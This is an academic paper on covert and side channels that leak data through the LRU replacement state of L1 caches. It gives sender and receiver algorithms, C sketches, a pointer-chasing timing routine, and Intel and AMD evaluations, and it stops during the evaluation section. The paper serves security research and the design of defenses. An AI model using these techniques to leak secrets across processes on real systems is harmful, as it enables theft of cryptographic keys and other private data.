Leaking Information Through Cache LRU States
Wenjie Xiong
Yale University, New Haven, CT 06520, USA
[email protected]

Jakub Szefer
Yale University, New Haven, CT 06520, USA
[email protected]
ABSTRACT
The Least-Recently Used cache replacement policy and its variants are widely deployed in modern processors. This paper shows for the first time in detail that the LRU states of caches can be used to leak information: any access to a cache by a sender will modify the LRU state, and the receiver is able to observe this through a timing measurement. This paper presents LRU timing-based channels both when the sender and the receiver have shared memory, e.g., shared library data pages, and when they are separate processes without shared memory. In addition, the new LRU timing-based channels are demonstrated on both Intel and AMD processors in scenarios where the sender and the receiver are sharing the cache in both a hyper-threaded setting and a time-sliced setting. The transmission rate of the LRU channels can be up to 600Kbps per cache set in the hyper-threaded setting. Different from the majority of existing cache channels, which require the sender to trigger cache misses, the new LRU channels work with the sender only having cache hits, making the channel faster and more stealthy. This paper also demonstrates that the new LRU channels can be used in transient execution attacks, e.g., Spectre. Further, this paper shows that the LRU channels pose threats to existing secure cache designs, and this work demonstrates that the LRU channels affect the secure PL cache. The paper finishes by discussing and evaluating possible defenses.
1. INTRODUCTION
Side channels and covert channels in processors have been gaining renewed attention in recent years [1]. Many of these channels leverage timing information. To date, researchers have shown numerous timing-based channels in caches, e.g., [2, 3, 4, 5, 6, 7], as well as in other parts of the processor, such as the shared functional units in simultaneous multithreading (SMT) processors, e.g., [8, 9, 10, 11, 12, 13, 14, 15]. The canonical examples of timing channels are the channels in caches, where timing reveals information about cache states. This in turn can be used to leak information, such as cryptographic keys, e.g., [16, 17, 18, 4, 19]. Further, many of the variants of the recent Spectre and Meltdown attacks also use covert channels, in addition to transient execution, to exfiltrate data, e.g., [20, 21, 22].

In processor caches, the order in which cache lines are evicted depends on the cache replacement policy. Normally, different variants of the Least-Recently Used (LRU) policy are implemented in modern processors, such as Tree-PLRU [23] or Bit-PLRU [24]. In a cache, the LRU state is maintained for each cache set, and it is used to determine which cache line in the set should be evicted when there is a cache miss causing a cache replacement. The LRU state is updated on every cache access to indicate which cache line in the set was just accessed. Thus, both cache hits and misses in the set cause updates to the LRU state of the set.

The basis of the new LRU timing-based channels is the timing of cache accesses, as it is affected by the LRU states. Thus, the LRU channels work even when the sender only triggers a cache hit, and the receiver later triggers a possible replacement and then measures the time, unlike prior attacks, which require a cache miss to be triggered by the sender. This makes the attacks more stealthy. It may also allow the attacks to bypass defenses such as those based on performance counters [25], where the behavior of cache misses is monitored. Moreover, the lack of required misses for the sender benefits transient execution attacks, as only a small speculation window is required for the sender to trigger a cache hit, compared to a miss.

The new LRU timing-based channels are also a threat to many of the existing secure cache proposals. Numerous secure caches [26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36] have been presented, and they aim to either partition or randomize the victim's and the attacker's cache accesses to defend against cache timing-based side channels. However, most of the secure caches have not considered the LRU states and are vulnerable to the new LRU channel. In particular, this paper demonstrates the vulnerability to the new LRU-based attacks in the well-known Partition-Locked (PL) cache [27], and then shows how to mitigate the attacks in the PL cache.

In this paper, the new LRU timing-based channels are demonstrated and evaluated in depth for the first time. The biggest challenge of the LRU channels is how the receiver can accurately observe which level of cache a memory access hits in, i.e., how to measure the timing precisely. This paper proposes to use dedicated data structures and a pointer chasing algorithm in the receiver's program to allow for fine-grained measurements of the latency of the memory accesses. Further, two algorithms are designed to build LRU timing channels: both with and without shared memory between the sender and the receiver, making the LRU channels practical in a variety of attack scenarios.
We evaluated the LRU channels on a number of commercial processors, including Intel and AMD processors with different microarchitectures, and both hyper-threaded and time-sliced sharing settings are considered. The LRU channels are also demonstrated in a Spectre attack. The contributions of this work are as follows:
• The first detailed presentation of how the LRU states in caches can be used as timing-based side and covert channels for information leaks, both with and without shared memory between the sender and the receiver.
• Detailed analysis and evaluation of the LRU channels, including evaluation of the transmission rates and bit error rates of the LRU covert channels on both Intel and AMD processors, and comparison of the LRU channels with the existing cache channels from the perspective of encoding time and cache miss rates.
• Demonstration of the LRU channels in transient execution attacks.
• Demonstration in the gem5 simulator of how the LRU channels break the security of the PL cache [27], and how it can be fixed.
• Proposal for, and evaluation of, mitigations of the LRU channels.
2. BACKGROUND
2.1 Timing-Based Cache Channels
There are typically two types of timing-based cache side and covert channels. One type leverages contention in the cache banks [9, 11]. The other leverages the state in the cache, e.g., the tag state (whether a certain address is in the cache) [2, 3, 4, 5] or the cache coherence state [7]. Like other side and covert channels leveraging port contention [8, 10, 12], channels leveraging contention in the cache banks [9, 11] require the sender and the receiver to execute concurrently as two hyper-threads. Channels using cache states leverage the fact that whether a cache line is available in the cache or not affects the timing of cache operations. The sender and the receiver do not have to be two concurrent hyper-threads; they can be within one thread or share the cache in a time-sliced setting. All these existing channels, however, require a cache miss by the sender to change the cache state when the sender is sending information. For example, in Flush+Reload attacks [2], the sender needs to access the cache line that was previously flushed to memory by the receiver, so the access will cause a cache miss. Meanwhile, any cache access, whether a cache hit or a miss, can trigger the new LRU attack.
When a cache line is accessed but it is not in the cache (i.e., a cache miss), the cache line will be fetched into the cache set. In this case, another cache line needs to be evicted from the cache set to make room for the incoming cache line. The replacement policy selects a cache way from the set to evict, known as the victim way. The replacement algorithm uses some state to store the history of accesses to cache ways in a given set. In the L1 cache, the LRU policy and its variants are most widely used because they give a high cache hit rate. In the last level cache (LLC), due to the reduced data locality, other replacement policies can be used [37, 38].
LRU:
The LRU algorithm keeps track of the age of cache lines. If a cache replacement is needed on a cache miss, the least recently used cache way (i.e., the oldest way) will be selected to be the victim way and will be evicted. In an N-way cache, log2(N) bits are used per cache way to store the age of the line, for a total of N*log2(N) bits for each cache set. The "true" LRU algorithm is expensive in terms of latency (to update the LRU states) and area (to store the age of all the cache lines), so often a variant of Pseudo Least-Recently Used (PLRU) is used instead.
Tree-PLRU:
The Tree-PLRU [23] policy uses a binary tree structure to keep track of the cache access history in a cache set. Each tree node indicates whether the left sub-tree or the right sub-tree has been less recently used. To find the victim way, the replacement algorithm starts from the root and always goes to the less recently used child to find the leaf node that indicates the victim way. To update the Tree-PLRU state when a cache line in a way is accessed, all the nodes on the path from the root to the accessed way's leaf node are set to point to the child that is not an ancestor of the accessed cache way. For an N-way cache, the tree has N − 1 internal nodes, so N − 1 bits are needed per cache set.
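To make the update and victim-selection rules concrete, the following is a minimal sketch of an 8-way Tree-PLRU in C. It is our own illustration, not hardware or vendor code: tree_bits[i] = 0 means the left sub-tree of node i is the less recently used side.

    #include <stdint.h>

    #define WAYS 8
    static uint8_t tree_bits[WAYS - 1];    /* node i's children are 2i+1 and 2i+2 */

    /* Walk from the root toward the less recently used child; the leaf reached
     * is the victim way. */
    int plru_victim(void) {
        int node = 0;
        while (node < WAYS - 1)
            node = 2 * node + 1 + tree_bits[node];
        return node - (WAYS - 1);          /* leaf index equals the way index */
    }

    /* On every access (hit or miss), make each node on the path point away
     * from the accessed way, marking the other side as less recently used. */
    void plru_touch(int way) {
        int node = (WAYS - 1) + way;
        while (node > 0) {
            int parent = (node - 1) / 2;
            tree_bits[parent] = (node == 2 * parent + 1) ? 1 : 0;
            node = parent;
        }
    }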
Bit-PLRU:
The Bit-PLRU [24] policy, also called the Most Recently Used (MRU) policy, uses one bit to store the history of each cache way, called the MRU-bit. When a way is accessed, its MRU-bit is set to 1, indicating the way was recently used. Once all the ways have their MRU-bits set to 1, all the MRU-bits are reset to 0. To find a victim, the way with the lowest index whose MRU-bit is 0 is chosen. For an N-way cache set, a total of N bits are required. The logic of Bit-PLRU is simpler than that of Tree-PLRU.
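A corresponding sketch of Bit-PLRU for an 8-way set follows; it is our own illustration of the description above (some implementations keep the MRU-bit of the just-accessed way set after the reset).

    #include <stdint.h>

    #define WAYS 8
    static uint8_t mru_bit[WAYS];

    void bitplru_touch(int way) {
        mru_bit[way] = 1;
        int all_set = 1;
        for (int i = 0; i < WAYS; i++)
            all_set &= mru_bit[i];
        if (all_set)                        /* all ways marked: reset the bits */
            for (int i = 0; i < WAYS; i++)
                mru_bit[i] = 0;
    }

    int bitplru_victim(void) {
        for (int i = 0; i < WAYS; i++)
            if (!mru_bit[i])
                return i;                   /* lowest-index way with MRU-bit 0 */
        return 0;                           /* only reachable right after a reset */
    }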
3. THREAT MODEL AND ASSUMPTIONS
In this paper, we demonstrate a covert channel, and we always use the terms sender and receiver. A cache covert channel can be extended to a side channel when the victim has secret-dependent accesses [2, 3, 4, 5, 9]. We assume N-way set-associative caches and further assume the cache uses an LRU, Tree-PLRU, or Bit-PLRU replacement algorithm which evicts the least recently used cache line. Like all other side or covert channels, the LRU timing-based channel involves two parties: the sender and the receiver. Following techniques used in [39, 40], we assume the two parties can be co-located on the same core to share the L1 cache, as shown in Figure 1, either in an SMT machine as two hyper-threads running in parallel or as two threads time-sharing the core.
Figure 1: Cache organization and the phases of the new LRU timing-based side and covert channels.

The LRU states of the shared cache can be influenced (by the sender) and observed (by the receiver). Existing attacks, such as side channels [11, 12, 13, 14, 15] or Spectre attacks using the Branch Target Buffer (BTB) or Return Stack Buffer (RSB) [20, 41, 42], show that sharing of the same physical core is practical and poses real threats to computer systems. In this paper, we focus on the LRU states in the L1 cache; LRU channels in the other levels of the cache are also possible. Depending on the cache architecture, for the sender to update the LRU states of the lower levels of the cache, a miss in the higher cache level is required, e.g., the sender's accesses that hit in the L1 or L2 caches will not change the replacement state in the LLC. In particular, L1 is directly accessed by the processor pipeline, and the L1 LRU state is updated on every memory access, so an attack on the LRU states of L1 is more stealthy. Furthermore, timing channels in the LRU states of L2 or the LLC can be detected or protected against by applying existing cache side-channel detection or protection techniques to L1 and prefetching the security-relevant data into L1. For all types of attacks, we assume the receiver can extract useful information from the memory access pattern of the sender, which modifies the LRU states.
4. LRU TIMING-BASED CHANNELS
Our new LRU timing-based channels leverage the LRU states of cache sets. In this section, we discuss how the LRU state in one cache set, referred to as the target set, can be used to transfer information. The LRU state for each set contains several bits, thus it is possible to transfer more than 1 bit per target set. However, limited by the fact that any access to the set will change the LRU state, we focus on letting the receiver measure the set only once. Specifically, the receiver observes the timing of one memory access, which can only have two results: a cache hit or a cache miss. Thus, at most one bit can be transferred per cache set at one time. (Concurrently with this submission, a preprint [43] was posted on arXiv on side channels that leverage the replacement policy in the LLC. However, our work demonstrates the LRU channels both with and without shared memory and without using the clflush instruction.) To transfer information using an LRU channel, there are in general three phases:
Initialization Phase:
First, a sequence of memory accesses is performed so that the LRU state is partially known to the receiver.
Encoding Phase:
To send information, the sender accesses one or more memory locations mapping to the target set to change the LRU state. The pattern of memory accesses depends on the information to be sent. The algorithms in this paper are designed to be lightweight in the encoding phase, where the sender only needs to do at most one memory access.
Decoding Phase:
The receiver first accesses one or more memory locations mapping to the target set to potentially trigger a cache replacement and cause a cache line to be evicted based on the LRU state. The receiver then observes the timing of accessing the memory location to learn whether the cache line was evicted and thus infer what the LRU state was.
Algorithm 1 shows a communication protocol using the LRU cache states, assuming shared memory. The sender and the receiver first agree on the target cache set they will use to transfer information. We use the terms line 0 – line N to denote N+1 different cache lines that map to the target set. This can be achieved by using data at N+1 different physical addresses with the same cache index bits but different tag bits. Note that line n (where n ∈ [0, N]) refers to a cache line with a certain physical address and not a specific cache entry, and the name does not imply a literal physical address n; line n could be placed in any cache way in the set. In Algorithm 1, the sender and the receiver both need to use the same physical address (or a physical address within the same cache line) to access cache line 0. This can be achieved through a memory location in a shared dynamically linked library, as in [2]. Further, m is a 1-bit message to be sent, and d is a parameter indicating how the receiver's accesses are split between the initialization and decoding phases. The sender and the receiver can then build a channel following Algorithm 1.

Algorithm 1: LRU Channel with Shared Memory
  line 0 – line N: cache lines mapping to the target set
  m: a 1-bit message to transfer on the channel
  d: a parameter of the receiver
  Receiver Operations:
    // Step 0: Initialization Phase
    for i = 0; i < d; i = i + 1 do
        Access line i;
    end
    sleep;  // to allow the sender code to run here for encoding
    // Step 2: Decoding Phase
    for i = d; i < N + 1; i = i + 1 do
        Access line i;
    end
    Access line 0 and time the access;
  Sender Operations:
    // Step 1: Encoding Phase
    if m = 1 then
        Access line 0;
    else
        Do not access line 0;
    end

For example, when N = 8 and d = 8, the sequence of memory accesses when sending m = 0 is as follows:
• Init. Phase: 0 → 1 → 2 → 3 → 4 → 5 → 6 → 7
• Encoding Phase: no access
• Decoding Phase: 8 → 0, and the receiver will observe an L1 miss when accessing line 0 in the end. (With PLRU replacement algorithms, line 0 is not guaranteed to be evicted. However, as will be evaluated in Section 4.3, line 0 will be evicted in most of the cases.)
Meanwhile, the sequence of memory accesses when sending m = 1 is as follows:
• Init. Phase: 0 → 1 → 2 → 3 → 4 → 5 → 6 → 7
• Encoding Phase: 0 (hit)
• Decoding Phase: 8 → 0. Because the sender just accessed it, line 0 is the newest line in the LRU state, and the remaining accesses in the decoding phase will not evict it. When the receiver measures the time of accessing line 0 in the decoding phase, the receiver will observe an L1 cache hit, and the receiver can infer that the sender has sent m = 1.

Comparing Algorithm 1 with the Flush+Reload attack [2], both require shared memory, but the LRU channel does not require an explicit flush, and line 0 might always be in the cache, i.e., the sender might only have cache hits.
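As a concrete illustration of Algorithm 1, the following is a minimal user-space sketch in C. It is not the authors' code: shared_line0 is assumed to be a mapping of the shared library line, line[1..8] are receiver-private addresses assumed to map to the same L1 set, and time_one_access() stands in for the pointer-chasing measurement described in Section 4.4.

    #include <stdint.h>

    #define N_WAYS 8                                    /* associativity N          */
    extern volatile uint8_t *shared_line0;              /* line 0 in a shared page  */
    extern volatile uint8_t *line[N_WAYS + 1];          /* line[1..N] in own memory */
    extern uint64_t time_one_access(volatile uint8_t *p);  /* Section 4.4 timer     */

    /* Sender: Step 1 (Encoding Phase). A single access, typically a cache hit. */
    void sender_encode(int m) {
        if (m == 1)
            (void)*shared_line0;
    }

    /* Receiver: one round with parameter d; returns the decoded bit. */
    int receiver_round(int d, uint64_t l1_hit_threshold) {
        for (int i = 0; i < d; i++)                      /* Step 0: initialization  */
            (void)*(i == 0 ? shared_line0 : line[i]);
        /* ... sleep here so the sender's encoding access can interleave ...        */
        for (int i = d; i < N_WAYS + 1; i++)             /* Step 2: decoding         */
            (void)*line[i];
        return time_one_access(shared_line0) <= l1_hit_threshold;  /* hit => m = 1 */
    }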
In Algorithm 2, the sender and the receiver do not need to access any shared memory location. The sender and the receiver can map memory accesses to the target set by using proper virtual memory addresses in their own address spaces. For performance, the L1 cache is usually virtually-indexed and physically-tagged (VIPT). For example, for an L1 cache with 64 sets and a cache line size of 64 bytes, bits 6–11 of the address decide the cache set. The receiver can make sure lines 0–(N−1) map to the same set as line N by using memory locations whose bits 6–11 of the virtual address are the same as those of line N. The sender and the receiver can then build a channel following Algorithm 2.

Algorithm 2: LRU Channel w/o Shared Memory
  line 0 – line N: cache lines mapping to the target set
  m: a 1-bit message to transfer on the channel
  d: a parameter of the receiver
  Receiver Operations:
    // Step 0: Initialization Phase
    for i = 0; i < d; i = i + 1 do
        Access line i;
    end
    sleep;  // to allow the sender code to run here for encoding
    // Step 2: Decoding Phase
    for i = d; i < N; i = i + 1 do
        Access line i;
    end
    Access line 0 and time the access;
  Sender Operations:
    // Step 1: Encoding Phase
    if m = 1 then
        Access line N;
    else
        Do not access the target set;
    end

For example, when N = 8 and d = 4, the order of memory accesses when sending m = 0 is as follows:
• Init. Phase: 0 → 1 → 2 → 3
• Encoding Phase: no access
• Decoding Phase: 4 → 5 → 6 → 7
The order of memory accesses when sending m = 1 is:
• Init. Phase: 0 → 1 → 2 → 3
• Encoding Phase: 8 (hit, if line 8 is in the cache before the Init. Phase)
• Decoding Phase: 4 → 5 → 6 → 7, and line 0 will be evicted when line 7 misses in the cache.
The receiver will observe an L1 cache hit when accessing line 0 if the sender is sending m = 0, and will observe an L1 cache miss if the sender is sending m = 1. Compared to Algorithm 1, there will be more noise in this channel, as any thread accessing the target set can cause line 0 to be evicted; a miss of line 0 does not necessarily mean that the sender accessed line 8. The noise is due to the lack of shared memory, and other known cache side-channel attacks (e.g., the Prime+Probe channel [3]) have this source of noise as well.

Comparing Algorithm 2 with the Flush+Reload attack, no shared memory is required. Comparing Algorithm 2 with the Prime+Probe attack [3], in Prime+Probe the receiver accesses the whole set in both the prime and the probe phases, and the sender has a miss between the two phases. Meanwhile, in Algorithm 2, the receiver does not access the whole set in either phase, and the receiver only needs to measure the time of one memory access in the LRU channel rather than the time of N memory accesses in the Prime+Probe attack. Moreover, the sender's data, line N, might always be in the cache.

In true LRU, the least recently used way is always chosen as the victim. Consider the following two memory access sequences in an 8-way cache, with each number representing an access to a cache line in the set:
• Sequence 1 (access in order): 0 → 1 → 2 → 3 → 4 → 5 → 6 → 7 → 8
• Sequence 2 (access in order with random insertion): 0 (→ x) → 1 (→ x) → 2 (→ x) → 3 (→ x) → 4 (→ x) → 5 (→ x) → 6 (→ x) →
7. Here, line x is a cache line that maps to this cache set and is different from lines 0–7. The parentheses indicate that the access might or might not happen, and we assume line x will be accessed at least once.

If true LRU is used, line 0 will be evicted in both sequences. However, in PLRU, line 0 is not guaranteed to be evicted. Because PLRU uses fewer state bits to track the memory access history, the cache LRU state before the access sequence could still affect the choice of victim way, and a longer history should be considered when analyzing PLRU. Consider the following initial conditions before accessing the above sequences:
• Random: The cache contains some of the lines 0–7 and possibly other lines, and the initial access order of lines 0–7 is random (e.g., the lines in the set are accessed in a random order, possibly with lines other than lines 0–7).
• Sequential: The cache contains some of the lines 0–7 and possibly other lines, and the initial access of lines 0–7 is in sequential order (e.g., the set is accessed in order with the random insertion of lines other than lines 0–7, like Sequence 2).

We implemented an in-house simulator to simulate the Tree-PLRU [23] and Bit-PLRU [24] replacement policies in an 8-way set. First, in the warm-up phase, we create accesses to the set for each of the possible initial conditions. Then, Sequence 1 or Sequence 2 is accessed in a loop, and whether line 0 is in the cache after each sequence is recorded for each loop iteration. We repeat the above test in the simulator 10,000 times for each configuration, and present the results in Table 1.

Table 1: Probability of line 0 being evicted with PLRU (initial condition and number of loop iterations vs. eviction probability under LRU, Tree-PLRU, and Bit-PLRU for Sequences 1 and 2).

Table 2: Latency of cache access (cycles).
  Microarchitecture    L1D   L2
  Intel Sandy Bridge   4-5   12
  Intel Skylake        4-5   12
  AMD Zen              4-5   17

As shown in Table 1, under the random initial condition, line 0 might still be kept in the cache with a high probability. Meanwhile, the sequential initial condition gives a high probability of line 0 being evicted after several loop iterations, especially for Sequence 1 and the Bit-PLRU. Note that true LRU will always evict line 0. Thus, to build a covert channel through the LRU states under a PLRU policy, the receiver should ensure the sequential initial condition by placing lines 1–7 in the receiver's address space and then always accessing them in order, to maximize the success rate.
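The paragraph above describes the simulation only at a high level; the sketch below shows the kind of experiment meant, reusing the Tree-PLRU helpers plru_victim()/plru_touch() sketched in Section 2. It is our own illustration (the authors used an in-house simulator), and the warm-up loop is only a rough stand-in for the random initial condition.

    #include <stdio.h>
    #include <stdlib.h>

    extern int  plru_victim(void);        /* Tree-PLRU helpers from Section 2 */
    extern void plru_touch(int way);

    #define SIM_WAYS 8
    static int set_tag[SIM_WAYS];         /* tags currently held by the 8-way set */

    static void access_line(int tag) {
        for (int w = 0; w < SIM_WAYS; w++)
            if (set_tag[w] == tag) { plru_touch(w); return; }   /* cache hit      */
        int victim = plru_victim();                             /* miss: replace  */
        set_tag[victim] = tag;
        plru_touch(victim);
    }

    int main(void) {
        int evicted = 0, trials = 10000;
        for (int t = 0; t < trials; t++) {
            for (int w = 0; w < SIM_WAYS; w++) set_tag[w] = -1;
            for (int i = 0; i < 64; i++) access_line(rand() % 16);  /* warm-up     */
            for (int rep = 0; rep < 8; rep++)                       /* 8 passes of */
                for (int i = 0; i <= SIM_WAYS; i++) access_line(i); /* Sequence 1  */
            int present = 0;
            for (int w = 0; w < SIM_WAYS; w++) present |= (set_tag[w] == 0);
            if (!present) evicted++;
        }
        printf("line 0 evicted after the last pass in %.1f%% of trials\n",
               100.0 * evicted / trials);
        return 0;
    }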
The major challenge for the receiver is to measure the memory access time precisely and to distinguish an L1 cache hit from an L1 cache miss (an L2 cache hit or longer). Table 2 shows the access latency of an L1 hit and an L1 miss on the microarchitectures we tested.

    rdtscp
    movl %eax, %esi
    movq (%rbx), %rax   // L1 hit
    movq (%rax), %rax   // L1 hit
    movq (%rax), %rax   // L1 hit
    movq (%rax), %rax   // L1 hit
    movq (%rax), %rax   // L1 hit
    movq (%rax), %rax   // L1 hit
    movq (%rax), %rax   // L1 hit
    movq (%rax), %rax   // target address to measure
    rdtscp
    subl %esi, %eax
Figure 2:
Pointer chasing algorithm used to measure time.
Figure 3:
Histogram of access latencies of seven L1 hits and the 8th access being an L1 hit or miss when measuring one target address with pointer chasing, (left) on Intel Xeon E5-2690 and (right) on AMD EPYC 7571.
An L1 hit takes less than 5 CPU cycles, and an L2 hit takes about 10–20 CPU cycles. Due to the noise caused by serialization and the granularity of the time stamp counter, using the rdtscp instruction (or lfence and rdtsc instructions) to measure the latency of a single memory access cannot distinguish an L1 hit from an L2 hit; the measurement results of an L1 hit and an L2 hit are the same. Thus, we use a pointer chasing algorithm and a dedicated data structure to measure one memory access precisely. The pointer chasing algorithm in Figure 2 requires a linked list, where each element stores the address of the next element. In the code listed, rbx points to the head of the linked list. Since the address of each mov instruction depends on the data fetched by the previous mov instruction, all eight accesses are serialized. However, in a side and covert channel scenario, it is not practical for Algorithm 1 to build a linked list containing the sender's memory access destination in a read-only shared library. Instead of a linked list in the shared library, we use a linked list of 7 elements in the receiver's own memory space, and let the 7th element contain the memory address to be measured. In this way, when measuring latency with the pointer chasing algorithm in Figure 2, the receiver first accesses the 7 local elements and then the target address at the end. Before running the measurement, the receiver can fetch the first 7 local elements into the L1 cache, so the first 7 accesses always hit in L1, and the total time depends on whether the 8th element is in the L1 cache or not. (The size of the linked list does not have to be 7. However, if the size is small, the noise due to lfence will affect the measurements; if the size is large, there will be noise in accessing the elements of the linked list.) To avoid the first 7 elements polluting the LRU state of the target set, the 7 elements can be placed in one cache set, and any other set can be used as the target set.
Algorithm 3: Covert Channel Protocol
  m: k-bit message to be sent on the channel
  Ts: sender's sending period
  Tr: receiver's sampling time
  TSC: current time stamp counter, obtained by rdtscp
  Sender Code:
    for i = 0; i < k; i = i + 1 do
        for an amount of time Ts do
            Step 1: Encoding Phase, encoding m[i]
        end
    end
  Receiver Code:
    while True do
        Step 0: Initialization Phase
        while TSC < T_last + Tr do
            nothing;
        end
        T_last = TSC
        Step 2: Decoding Phase
    end
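Below is a minimal sketch (ours, not the authors' code) of the two pacing loops in Algorithm 3 using the rdtscp intrinsic; send_bit() and receive_bit() are assumed to wrap the encoding and decoding steps of Algorithm 1 or 2.

    #include <stdint.h>
    #include <x86intrin.h>

    extern void send_bit(int m);          /* one encoding-phase pass (Alg. 1 or 2) */
    extern int  receive_bit(void);        /* initialize, decode, and time line 0   */

    void sender_loop(const int *msg, int k, uint64_t Ts) {
        unsigned aux;
        for (int i = 0; i < k; i++) {
            uint64_t start = __rdtscp(&aux);
            while (__rdtscp(&aux) - start < Ts)    /* keep encoding bit i for Ts   */
                send_bit(msg[i]);
        }
    }

    void receiver_loop(int *out, int samples, uint64_t Tr) {
        unsigned aux;
        uint64_t last = __rdtscp(&aux);
        for (int i = 0; i < samples; i++) {
            while (__rdtscp(&aux) - last < Tr)     /* sample once every Tr cycles  */
                ;
            last = __rdtscp(&aux);
            out[i] = receive_bit();
        }
    }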
Table 3: Specifications of the tested CPU models.
  Model               Intel Xeon E5-2690   Intel Xeon E3-1245 v5   AMD EPYC 7571 (a)
  Microarchitecture   Sandy Bridge         Skylake                 Zen
  Number of cores     8                    4                       N/A
  L1D size per core   32KB                 32KB                    32KB
  L1D associativity   8-way                8-way                   8-way
  Frequency           3.8GHz               3.9GHz                  2.5GHz
  OS                  Ubuntu 16.04.1
  (a) We use the AMD processor on the Amazon AWS EC2 platform. The CPU model is specific to Amazon AWS; one core was leased for our experiments.
Figure 3 shows the result of this measurement strategy (L1 hits for the first 7 elements, with the 8th element being an L1 hit or miss). The difference between an L1 hit and an L1 miss of the 8th element is clearly distinguishable on the Intel processors. The latencies of an L1 hit and an L1 miss also show different distributions on the AMD processor.
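A C approximation of this measurement setup is sketched below; it is our own illustration of the description above, not the authors' code (they use the inline assembly of Figure 2, which also avoids the compiler interfering with the dependent loads). The seven list nodes are assumed to be warmed into L1 and placed so that they do not map to the target set.

    #include <stdint.h>
    #include <x86intrin.h>

    /* nodes[] holds 7 pointers in the receiver's own memory; the 7th points
     * at the target line, so 8 dependent loads end with the timed access. */
    void chain_setup(void *nodes[7], void *target) {
        for (int i = 0; i < 6; i++)
            nodes[i] = (void *)&nodes[i + 1];   /* node i stores the address of node i+1 */
        nodes[6] = target;
    }

    uint64_t chain_time(void *nodes[7]) {
        unsigned aux;
        void *p = (void *)&nodes[0];
        uint64_t start = __rdtscp(&aux);
        for (int i = 0; i < 8; i++)             /* 8 serialized loads, as in Figure 2 */
            p = *(void * volatile *)p;
        uint64_t end = __rdtscp(&aux);
        (void)p;
        return end - start;                     /* reflects whether the target hit in L1 */
    }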
5. EVALUATION
To evaluate the transmission rate of the LRU channel, we evaluate it as a covert channel using one target set in the L1 data cache. As shown in Algorithm 3, the sender sends each bit of message m for Ts CPU cycles, by running the sender's operations (in Algorithm 1 or 2) in a loop for Ts cycles for each bit in the message that the sender wants to send. Ts determines the transmission rate. We calculate the transmission rate as the total number of bits sent divided by the time (measured by time in Linux). The receiver runs the receiver's operations (in Algorithm 1 or 2) every Tr CPU cycles in a loop and measures the latency using the pointer chasing approach discussed in Section 4.4. The evaluation is conducted on both Intel and AMD processors. The specifications of the tested CPU models are listed in Table 3. We evaluated both the LRU channel with shared memory and the one without shared memory presented in Section 4, under both hyper-threaded sharing and time-sliced sharing settings.

Figure 4: Example sequences of the receiver's observations when the sender is sending 0 and 1 alternately on Intel Xeon E5-2690 with a transmission rate of 480Kbps, using (top) Algorithm 1 with Tr=600, Ts=6000, and d=8, and (bottom) Algorithm 2 with Tr=600, Ts=6000, and d=4. The blue dots show the latencies observed by the receiver, and the red dotted line shows the threshold for an L1 cache hit.

For the hyper-threaded case, we tested the covert channel when the sender and the receiver are sharing the same physical core as two hyper-threads. The sender and the receiver are each a process (i.e., a separate program) in Linux.
LRU Channel with Shared Memory:
In Algorithm 1, shared memory is needed between the sender and the receiver processes, e.g., achieved through a shared library. Figure 4 (top) shows the traces observed by the receiver when the sender is sending 0 and 1 alternately. When the sender is sending bit 1, the access time of line 0 measured by the receiver is shorter, as discussed in Section 4.1. Due to the space limit, only the results on the Intel Xeon E5-2690 are shown in Figure 4. Evaluation on the E3-1245 v5 shows similar results, except that the two processors have different thresholds for L1 hit and miss latencies. This is due to the different L1 and L2 cache access latencies on the two processors. Also, the two processors run at different frequencies, and thus, even with the same Ts = 6000, the transmission rate is 480Kbps on the E5-2690 and 580Kbps on the E3-1245 v5.

In the evaluation, the sender process sends a random 128-bit binary string repeatedly. There are 3 types of errors in the channel: 1) bit flips, 2) bit insertions, or 3) bit losses. To evaluate the error rate of the channel, the edit distance between the sent string and the received string is calculated using the Wagner-Fischer algorithm [44]. We evaluate Tr = {600, 1000, 3000} cycles and four values of Ts. The receiver's operations of Algorithm 1 in total take about 560 cycles, including logging of the results, and thus Tr must be larger than that. Since d can be at most 8, we test the parameter d = {1, 2, 3, 4, 5, 6, 7, 8}. Also, the 128-bit string is sent at least 30 times to obtain the average errors.

Figure 5: Transmission error rate (evaluated by edit distance) as a function of the transmission rate (different Ts) for different Tr on Intel Xeon E5-2690 using (top) Algorithm 1 and (bottom) Algorithm 2.

Figure 5 (top) shows the error rate of the channel versus the different transmission rates (i.e., different values of Ts). As shown in the figure, d does not affect the error rate much on the E5-2690. This is because, in hyper-threaded sharing, the sender process and the receiver process execute in parallel; the sender operation can happen while the receiver is executing any part of its operation, and d only makes the sender operation more likely to happen during the sleep part of the receiver's operation. Tr = 1000 gives a slightly better error rate than Tr = 600. This might be because a greater Tr leads to more interleaving between the two threads, so the receiver can observe more of the sender's activity in one measurement. As Tr increases to 3000 cycles, the error rate increases. In general, the error rate increases as the transmission rate increases (i.e., as Ts decreases). This is because a greater Ts or a smaller Tr results in more measurements for each bit transmitted, and the noise can be canceled out by averaging the measurement results.

LRU Channel without Shared Memory:
In Algorithm 2, shared memory between the sender and the receiver is not required. Figure 4 (bottom) shows the traces observed by the receiver. When the sender is sending bit 1, the access time of line 0 measured by the receiver is longer, due to the sender's access to the same set. For Algorithm 2, we also evaluate the same set of values of Tr, Ts, and d. Figure 5 (bottom) shows the error rate versus the different transmission rates (different values of Ts) on the E5-2690. Compared to the LRU channel with shared memory, the LRU channel without shared memory has more noise. As indicated by the simulation results for Sequence 2 in Section 4.3, in Tree-PLRU, when the sender accesses the set, the receiver may not observe a miss in the end, resulting in a false 0. Also, any access to the same set (by another part of the program or by other processes on the core) may result in a false 1. However, these errors usually occur consecutively in time, so the receiver can detect the noise by observing a long sequence of all 1s or all 0s. We exclude those traces to obtain Figure 5. When d is even (2, 4, or 6), the error rate is large on the E5-2690, especially for large Tr. This is because an even d makes the Tree-PLRU point to the other side of the sub-tree, and the receiver will not evict line 0 during decoding.

Figure 6: Percentage of cache hits observed by the receiver on Intel Xeon E5-2690, when the sender is sending (left) 0 and (right) 1 using Algorithm 1 under time-sliced sharing.

